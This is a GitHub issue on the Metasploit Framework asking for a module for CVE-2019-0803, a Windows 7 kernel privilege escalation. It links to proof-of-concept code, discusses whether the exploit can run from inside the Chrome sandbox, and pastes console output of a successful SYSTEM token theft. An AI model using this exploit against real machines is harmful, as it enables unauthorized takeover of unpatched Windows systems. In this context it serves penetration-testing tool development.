rapid7 / metasploit-framework

Metasploit Framework
https://www.metasploit.com/

Add CVE-2019-0803 #13110

Open kokxxoo opened 4 years ago

kokxxoo commented 4 years ago

CVE-2019-0803 PoC supporting 32/64-bit Win7 SP1: https://bbs.pediy.com/thread-253465.htm
CVE-2019-0803 reproduction and debugging notes: https://bbs.pediy.com/thread-252645.htm
0803 exploit analysis: https://bbs.pediy.com/thread-252447.htm

PoC: https://github.com/ExpLife0011/CVE-2019-0803

timwr commented 4 years ago

Any idea if this is accessible from the Chrome sandbox on Windows 7? The proof of concept (https://github.com/ExpLife0011/CVE-2019-0803) seems to rely on starting itself (twice) with CreateProcess in order to create a DDEServer and DDEClient. I tried rewriting it to use threads instead but it's not working :(

tekwizz123 commented 4 years ago

@timwr Took a brief look over it and I didn't see anything too unusual about it, though I imagine one would need a closer inspection to be sure. Chrome sandbox, at least on Windows 7, doesn't have the win32k system call filtering that Windows 8 and later do, so the calls should in theory go through fine. Obviously some parts might need to be redone a bit to work inside the sandbox though.

timwr commented 4 years ago

The win32 APIs should be accessible, it's the way it spawns a new process for the DDEServer and DDEClient: https://github.com/ExpLife0011/CVE-2019-0803/blob/master/win7sp1/poc_test/main.cpp#L407 https://github.com/ExpLife0011/CVE-2019-0803/blob/master/win7sp1/poc_test/main.cpp#L558 that I'm not sure about.

kokxxoo commented 4 years ago

Not sure.

```
Run CMD: whoami

POC - CVE-2019-0803

[+]WND1: FFFFF900C0826B90, WND2: FFFFF900C0826CC0
[+]trying 0 times
[]DDEServer..PID: 1348
[]g_ClientCopyDDEIn1_ContinueAddr:00000000774530AC, g_BitMapAddr:00000000000000 00
[!]xxTriggerExploitEx Success
[]DDEServer Set BitmapAddr..0000000020050478
[]DDEClient..PID: 2884
[]DDEClientSendDDEMsg over..
[+]hTriggerWindow 000000000002061C
[]DDEServer exit..
[+]Wait
[+]SetDIBColorTable OK
[]text:
[+]hTriggerWindow OK
[]Searching for current processes EPROCESS structure
ptiaddress == fffff900c0173c30
tagTHREAD == fffffa80345ccb60
kapc_stateAddr == fffffa80345ccbb0
Original security token pointer: 0xfffff8a00ba35a97
[*]Searching for SYSTEM security token address
Next eprocess address: 0xfffffa80345ceb30
Found pid: 0x544
Next eprocess address: 0xfffffa80345d05d0
Found pid: 0xB44
Next eprocess address: 0xfffff80001a43a08
Found pid: 0x32F214F8
Next eprocess address: 0xfffffa8030ea4040
Found pid: 0x4
target process found!
[+]Security token to steal: 0xfffff8a000004bb6
Run Cmd...
[+] Trying to execute "whoami" as SYSTEM...
[+] Process created with pid 2260!
nt authority\system
```